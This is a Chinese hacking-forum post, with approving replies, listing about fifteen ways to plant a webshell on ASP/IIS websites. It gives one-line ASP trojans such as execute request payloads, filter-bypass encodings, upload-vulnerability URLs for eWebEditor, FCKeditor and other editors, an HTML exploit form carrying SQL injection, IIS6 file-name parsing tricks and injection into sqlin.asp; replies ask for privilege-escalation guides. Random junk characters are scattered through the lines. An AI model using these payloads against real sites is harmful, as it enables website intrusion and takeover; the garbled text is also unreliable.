返回列表 发帖

[原创文章] asp拿shell

1.有备份,上传图片备份。如不能修改文件后缀名,可备份成1.asp/1.mdb或1.asa/1.mdb的形式! D+ e8 O- E/ N

/ `4 O$ m. v! Q8 L4 k- x1 s6 o2.写入配置文件一句话木马,如果过滤了<,%,>,(,)可尝试&#60;&#37;eval request&#40;&#34;value&#34;&#41;&#37;&#62;来突破,例如config.asp
0 H' A5 r+ K0 r% O. h" a: y5 n7 P$ ^/ l* g( Y1 Q
3.上传漏洞:
- y; c! O, K8 y" ~4 r' b( M2 C5 G3 y2 y( ~+ x, a
动网上传漏洞:抓包nc提交,其中路径可改为zjq.asp 的形式,空格替换成0x00
2 k4 m+ X6 [# y' D: m# U) }4 E+ C6 m$ u
逻辑上传漏洞:同时上传两个文件,第一个为正常文件,第二个为iis可解析后缀文件: }$ ~. E3 p6 f( U" J- m
8 }. {% N: [& b: z2 ~
雷池上传漏洞:http://localhost/leichinews/admin/uploadPic.asp?actionType=mod&picName=test.asp
, S+ j0 H1 W2 P* I然后在上传文件里面填要传的图片格式的ASP木马" D5 w: ^- ~1 ]1 `. ?
就可以在uppic目录下上传文件名为test.asp的文件uppic/test.asp" i7 z+ N+ U) `! d- u
4.ewebeditor:有后台添加asa或aaspsp上传类型,前提要进入后台。没后台如2.16版本可利用如下代码上传
  d; V* [; \0 ?. S+ ]# h+ j
/ `" Q! p0 f8 C: G7 c<html>
1 v; |8 l. }) ^6 t<head>
' q7 [5 U) Y' q) ^' Q<title>ewebeditor upload.asp上传利用</title>
/ I6 ^( F7 {0 a1 j</head>1 G4 g, J6 Y2 z6 a& X5 I6 g! G
<body>, L+ z' E- T2 I
<form action="upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard' and 'a'='a" method=post name=myform enctype="multipart/form-data">
9 |; b4 C8 H; W; [- W* Y<input type=file name=uploadfile size=100><br><br>
6 e1 W3 r( J+ v. G5 Z<input type=submit value=Fuck>
' m' _- h9 {! W0 Z% W</form>4 p/ H( t5 N! W8 A0 H6 Y# a
</body>
" _6 A6 x6 r* D) y0 ~5 u</form>, o) f* \; A; A; d5 D  t0 H
</html>6 j! }4 K+ X0 Y) e) t1 j+ V

' l+ M0 K( r. u. Q, A2.8般亦可以利用admin_uploadfile.asp?id=14&dir=..列目录,前提是此文件可访问,或cookie欺骗后可访问$ x  T+ b3 m/ `0 c2 r, x
5.fckeditor:/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp8 N( k5 O2 k# @3 T1 l

4 |1 \, s6 n) r5 W! Z利用windows2003解析。建立zjq.asp的文件夹
5 R9 h+ |& q5 j0 e% B2 l! w# A8 r4 e. d
6.southidceditor:admin/SouthidcEditor/Admin_Style.asp?action=styleset&id=47。修改上传类型8 x8 B- O: q9 |* H8 N# {

% w2 W5 \4 f. h) D5 g- Y7.cuteeditor:类似ewebeditor2 b4 T  w% T6 }9 \2 O3 R( D
8 W- n( k% I# Z9 |
8.htmleditor:同上
2 p/ H9 v& O$ `- J
, T( p2 ~: [" M: r/ J9.插数据库一句话。前提是知道数据库路径,为asp,asa等后缀,无防下载表,有防下载表可尝试插入以下语句突破8 f& \2 ]3 v  Y9 f- s) c
: q! c! w2 w, y9 l: C" q
<%execute request("value")%><%'<% loop <%:%>
& m& L* v1 B( _3 _" ^7 i0 |7 H
7 q2 l# t& K* X5 y& U- Z<%'<% loop <%:%><%execute request("value")%>' s) ~/ A' v0 y% _3 F! z, A* O

- M/ H& Q' Y, C; |+ _& S<%execute request("value")'<% loop <%:%>  _( e& R3 \" O8 n5 \
9.查看cookie,看上传路径是否为cookie记录,可修改为*.asp的形式,利用2003解析漏洞
5 [6 a( S5 j# z9 Q3 P, v2 d' x9 B3 |; S) l% z& i) o* a& |) Z, ]# w
10.上传不重命名文件,可上传zjq.asp;zjq.jpg的文件,iis6.0解析漏洞% S4 x, |; t/ V4 `8 H# u
  |7 L* P5 U+ z6 ~! s( Q3 e4 T; G
11.注册用户名为zjq.asp,前提是网站会根据用户名新建一个以用户名命名的文件夹,上传正常图片木马,利用2k3$ R6 P' H. g1 {- v# x' g

+ [! b( k/ J% y* t解析漏洞得到webshell
* ?$ ?: f* F, x2 J8 J0 p. n' }9 |2 J7 {/ z
12.mssql差异备份,日志备份,前提需知道web路径
0 k6 `  l; w& W" Y$ G0 _
  q8 n# u4 \- D: a' J  I13.先备份数据库(拿到shell便于恢复网站访问),上传图片shell,数据库为asp,asa等后缀,恢复数据库填写图片路径,速度要快,因为恢复完网站就不能正常访问,一句话连接得webshell
, q2 V! w& h8 s6 t: M& p# t7 ~/ t' c& x, m
14.添加上传类型php,并上传phpshell,前提服务器能解析php,例如dvbbs8.2后台拿shell' o2 x. V' j7 ?" [; l# v
6 F: N# h, |# c, q* K4 z6 u
15.有些系统用的是防注入程序,数据库默认为sqlin.asp,我们可以www.xx.com/*.asp?id=1'<script language=VBScript runat=server>execute(request("zjq"))</Script>,这样就会在sqlin.asp中写入一句话shell,连接即可
; U8 M* u8 P/ t% s! R) Z
' s% y# K0 a4 Z. J; }以上只是本人的一些拙见,并不完善,以后想到了再继续添加% @: S$ @9 Q0 e- {  o/ N
不是我原创。我的朋友,飞鸟游鱼原创的
2

评分人数

  • 1335csy

  • 超超

好东西能分享 谢谢!!!

TOP

kankankankan
1

TOP

写的很不错

TOP

1# yyw258520
3 Q1 h( d0 l- E+ @) [. u# c
) b3 q. C0 e! }9 J+ |) u9 a* j' P5 k; Z1 Y: N3 @
很好啊、基本的入侵方法都包含了/ Y) L. \+ W2 O
2 S' X! r# g- W% m2 r4 H7 h  P' M
最好来个提权的帖子再。$ G9 K" r8 H6 [; W6 C
8 @, {, d+ G+ W* T$ {6 e" ?
不要网上百度的。

TOP

提权才是王道。

TOP

不错哦 呵呵 学习了

TOP

谢谢楼主分享技术。。。

TOP

返回列表